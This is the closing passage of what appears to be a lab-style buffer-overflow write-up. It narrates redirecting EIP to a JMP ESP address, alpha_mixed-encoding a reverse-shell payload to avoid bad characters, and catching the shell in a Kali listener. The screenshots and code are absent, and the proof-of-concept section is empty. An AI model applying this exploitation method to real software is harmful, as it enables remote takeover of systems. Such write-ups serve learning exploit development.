At this point, we can updated our EIP to redirect to this JMP ESP  address


As we follow the crash in immunity, we can see that EIP has been successfully overwritten with our JMP ESP address


...once we take the JMP ESP, we are redirected to the top of our Cs




Reverse shell time!

We will need to create our revere shell to encode it with x86/alpha_mixed in order to avoid the restricted characters


We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.



Final Proof-of-Concept




❌
❌